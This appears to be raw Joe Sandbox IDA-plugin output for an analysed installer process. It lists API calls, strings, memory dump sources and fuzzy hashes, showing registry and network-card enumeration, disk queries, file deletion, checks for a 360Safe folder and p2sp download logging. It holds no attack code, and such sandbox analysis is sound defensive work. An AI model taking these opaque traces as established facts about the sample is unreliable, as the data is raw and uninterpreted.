                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$Directory$File$CombineCountDeleteEmptyExistsFolderH_prolog3SpecialTick__wcstoi64_memset
                                                                                                                                                                      • String ID: 360\360Safe$\360Safe
                                                                                                                                                                      • API String ID: 2943068809-3795500535
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2A1F
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,?,?,?), ref: 001E2A3A
                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0024CDA4,?,?,?,?), ref: 001E2A6C
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?,?,?,?), ref: 001E2A96
                                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 001E2ACE
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2AE7
                                                                                                                                                                        • Part of subcall function 001E28D0: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 001E291E
                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00000000), ref: 001E2B18
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 001E2B63
                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 001E2B89
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?), ref: 001E2BA0
                                                                                                                                                                      Strings
                                                                                                                                                                      • ServiceName, xrefs: 001E2ABC
                                                                                                                                                                      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 001E2A30
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEnumOpen_memset$CreateFileQueryValuelstrcmp
                                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                      • API String ID: 2630661138-1795789498
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D42FD
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,0000000C), ref: 001D4327
                                                                                                                                                                      • _memset.LIBCMT ref: 001D438A
                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,00000000,00000400,00000400,?,?,\\.\), ref: 001D43BA
                                                                                                                                                                      • _wcslen.LIBCMT ref: 001D43D6
                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 001D43E1
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00020000,00000001,00000000,00000003,00000080,00000000,000000FF,?,?,\\.\), ref: 001D4418
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,0017BD49,00000000), ref: 001D4461
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 001D446C
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 001D4489
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeviceHandle$ControlCreateDriveFileH_prolog3QueryType__wcsnicmp_memset_wcslen
                                                                                                                                                                      • String ID: \Device\Harddisk$\\.\
                                                                                                                                                                      • API String ID: 3469461504-3168084310
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00184E50
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00184E85
                                                                                                                                                                      • LoadLibraryW.KERNEL32(Cabinet.dll,?,74DF3170), ref: 00184EEA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FDICreate), ref: 00184F02
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDICopy), ref: 00184F15
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDIIsCabinet), ref: 00184F28
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDIDestroy), ref: 00184F3B
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$CurrentLibraryLoadThreadValue
                                                                                                                                                                      • String ID: Cabinet.dll$FDICopy$FDICreate$FDIDestroy$FDIIsCabinet
                                                                                                                                                                      • API String ID: 3141885424-2042144077
                                                                                                                                                                      • Opcode ID: a5c6caab537496c6853b82b358690fadbaadd92e1b6dcbe9a1520070b5d1a5a7
                                                                                                                                                                      • Instruction ID: bb633ed7938526b8a1df558243299f08c17ce67ed666440c589ac403b2f01946
                                                                                                                                                                      • Opcode Fuzzy Hash: a5c6caab537496c6853b82b358690fadbaadd92e1b6dcbe9a1520070b5d1a5a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 5631C374940705AFC738AF75DC46DD2BBE4FB14701B114A6EE6AA82180DBB4A690CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F501DBC
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F501DC6
                                                                                                                                                                        • Part of subcall function 5F4EAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                      • _memset.LIBCMT ref: 5F501DF3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501DFB
                                                                                                                                                                        • Part of subcall function 5F4FDF99: WaitForSingleObject.KERNEL32(?,000000FF), ref: 5F4FDFA1
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E1A
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E2A
                                                                                                                                                                        • Part of subcall function 5F513FED: _memset.LIBCMT ref: 5F514020
                                                                                                                                                                        • Part of subcall function 5F513FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 5F51403B
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E57
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E63
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 5F501E9E
                                                                                                                                                                      Strings
                                                                                                                                                                      • p2sp.TaskScheduler, xrefs: 5F501DC1
                                                                                                                                                                      • [TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 5F501E41
                                                                                                                                                                      • [TaskScheduler] OnTimer cost:%dms, queue:%d., xrefs: 5F501E74
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$_memset$CurrentDispatcherEventExceptionH_prolog3ObjectSingleThreadUserWaitwvnsprintf
                                                                                                                                                                      • String ID: [TaskScheduler] OnTimer cost:%dms, queue:%d.$[TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.TaskScheduler
                                                                                                                                                                      • API String ID: 1333431131-1132454424
                                                                                                                                                                      • Opcode ID: 3cfe084f22275f37df1b9b5a66e93cbb7d861434eb5e706f9d4cfef2a5bf7553
                                                                                                                                                                      • Instruction ID: a3cc26cbcfd2d479c6deb8125002a61b3c4bbeb0c6a99ba890733800320b7511
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cfe084f22275f37df1b9b5a66e93cbb7d861434eb5e706f9d4cfef2a5bf7553
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D214BB2D112199FDB00EFF4C944AAEBBF9BF48211F10453BE115E6180D775AA158BA2
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D22E7
                                                                                                                                                                      • CoCreateInstance.OLE32(0022C868,00000000,00000001,0022C798,0017BD49,0000002C,001D45AD,?,?,?,?,?,?,?,?,?), ref: 001D2305
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D2364
                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001D2389
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D2405
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D240A
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 001D2460
                                                                                                                                                                      Strings
                                                                                                                                                                      • MediaType, xrefs: 001D2472
                                                                                                                                                                      • Root\Microsoft\Windows\Storage, xrefs: 001D232D
                                                                                                                                                                      • WQL, xrefs: 001D23D0
                                                                                                                                                                      • SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d', xrefs: 001D23A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeString$BlanketClearCreateH_prolog3InstanceProxyVariant
                                                                                                                                                                      • String ID: MediaType$Root\Microsoft\Windows\Storage$SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d'$WQL
                                                                                                                                                                      • API String ID: 2951287799-4271271752
                                                                                                                                                                      • Opcode ID: d7a06cabf4db139307cf82aa7e1925fb34de884b004821c24fc7f09ea70582f8
                                                                                                                                                                      • Instruction ID: f10a96fdc4924b5c7305b7a22260ede60c12aa7465d23550548d1e7b0b68edc3
                                                                                                                                                                      • Opcode Fuzzy Hash: d7a06cabf4db139307cf82aa7e1925fb34de884b004821c24fc7f09ea70582f8
                                                                                                                                                                      • Instruction Fuzzy Hash: DF717E71A00249EFDF05DFE4C889AADBBB8FF69304F248459F915AB290C7349E45CB21
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(06AC2023,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 001699D6
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169A0C
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169A1F
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169A2F
                                                                                                                                                                        • Part of subcall function 00169FA0: GetProcessHeap.KERNEL32(00000000,00169A51,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169FA3
                                                                                                                                                                        • Part of subcall function 00169FA0: HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169FB4
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00169A7F
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00169AA6
                                                                                                                                                                        • Part of subcall function 00169DE0: _memset.LIBCMT ref: 00169E27
                                                                                                                                                                        • Part of subcall function 00169DE0: TlsAlloc.KERNEL32 ref: 00169E53
                                                                                                                                                                        • Part of subcall function 00169DE0: __CxxThrowException@8.LIBCMT ref: 00169E73
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169ABE
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169AC9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw$AllocHeapMutexProcess$CloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_memset
                                                                                                                                                                      • String ID: %s %u$,$$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                      • API String ID: 750356677-1808174439
                                                                                                                                                                      • Opcode ID: 6cb0e6ee19572d5ceba66c876bc71b2cfc92a99219a7cbfde281a41b964ab2ef
                                                                                                                                                                      • Instruction ID: e8abf53e4ed91571fc95dbda07c9a451e15dd7883d220af1ed17ddd847048647
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cb0e6ee19572d5ceba66c876bc71b2cfc92a99219a7cbfde281a41b964ab2ef
                                                                                                                                                                      • Instruction Fuzzy Hash: D531F270904244ABDB10DFA4EC49BAE7BFCFF59714F408169E819D7281EB349A14CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001C94EB
                                                                                                                                                                      • _wcslen.LIBCMT ref: 001C9504
                                                                                                                                                                      • _memset.LIBCMT ref: 001C9542
                                                                                                                                                                        • Part of subcall function 001BD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD74A
                                                                                                                                                                        • Part of subcall function 001BD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD767
                                                                                                                                                                        • Part of subcall function 001BD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD77A
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,0000000C), ref: 001C9686
                                                                                                                                                                        • Part of subcall function 001BEE1E: __EH_prolog3.LIBCMT ref: 001BEE25
                                                                                                                                                                      • _memset.LIBCMT ref: 001C95F1
                                                                                                                                                                      • _memset.LIBCMT ref: 001C962F
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?,?,?,?,?,?,?,0000000C), ref: 001C9656
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,00000010,?,?), ref: 001C966A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File_memset$H_prolog3$DeleteDirectoryErrorFindFirstFullLastMoveNamePathRemove_wcslen
                                                                                                                                                                      • String ID: %s\%s$%s\*.*
                                                                                                                                                                      • API String ID: 1197279183-1665845743
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CE7FE
                                                                                                                                                                        • Part of subcall function 0018ECB6: __EH_prolog3.LIBCMT ref: 0018ECBD
                                                                                                                                                                        • Part of subcall function 001CE697: __EH_prolog3.LIBCMT ref: 001CE69E
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE887
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00120116,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE8D9
                                                                                                                                                                      • _wcslen.LIBCMT ref: 001CE8EA
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,0017BD49,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE901
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE925
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE92E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileH_prolog3$CloseCreateDeleteHandleWrite_memset_wcslen
                                                                                                                                                                      • String ID: %s\%s.tf
                                                                                                                                                                      • API String ID: 3257772056-3749842194
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,00000010,?), ref: 5F517390
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA2E7
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA301
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA311
                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA318
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA327
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 001CA349
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$Global$AllocFindFreeLoadLockSizeof
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3537612842-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D06B0
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000010), ref: 001D06CC
                                                                                                                                                                      • _memset.LIBCMT ref: 001D070A
                                                                                                                                                                        • Part of subcall function 001BD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD74A
                                                                                                                                                                        • Part of subcall function 001BD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD767
                                                                                                                                                                        • Part of subcall function 001BD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD77A
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,?), ref: 001D083D
                                                                                                                                                                        • Part of subcall function 001BEE1E: __EH_prolog3.LIBCMT ref: 001BEE25
                                                                                                                                                                      • _memset.LIBCMT ref: 001D07B9
                                                                                                                                                                      • _memset.LIBCMT ref: 001D07FA
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,0000000C,?), ref: 001D0821
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File_memset$H_prolog3Path$DeleteDirectoryErrorExistsFindFirstFullLastNameRemove
                                                                                                                                                                      • String ID: %s\%s$%s\*.*
                                                                                                                                                                      • API String ID: 3885202939-1665845743
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000006,0000044C), ref: 00197744
                                                                                                                                                                        • Part of subcall function 0018E185: GetDC.USER32(?), ref: 0018E193
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001977B4
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 001977D0
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0019780F
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 00197831
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0019784D
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00197880
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 001978A3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRectWindow$Item$CompatibleCreateObjectSelectViewport_malloc
                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4E55D5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,5F4FB438,00000000,?,?,5F4FC3E5,?,00000007,?), ref: 5F4E5643
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] ErrorCode =%d,StartDownload, xrefs: 5F4E56A3
                                                                                                                                                                      • [%d.] ErrorCode =%d,, xrefs: 5F4E5650
                                                                                                                                                                      • [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d , xrefs: 5F4E56F2
                                                                                                                                                                      • [%d.] , xrefs: 5F4E55EB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorH_prolog3Last_memsetwvnsprintf
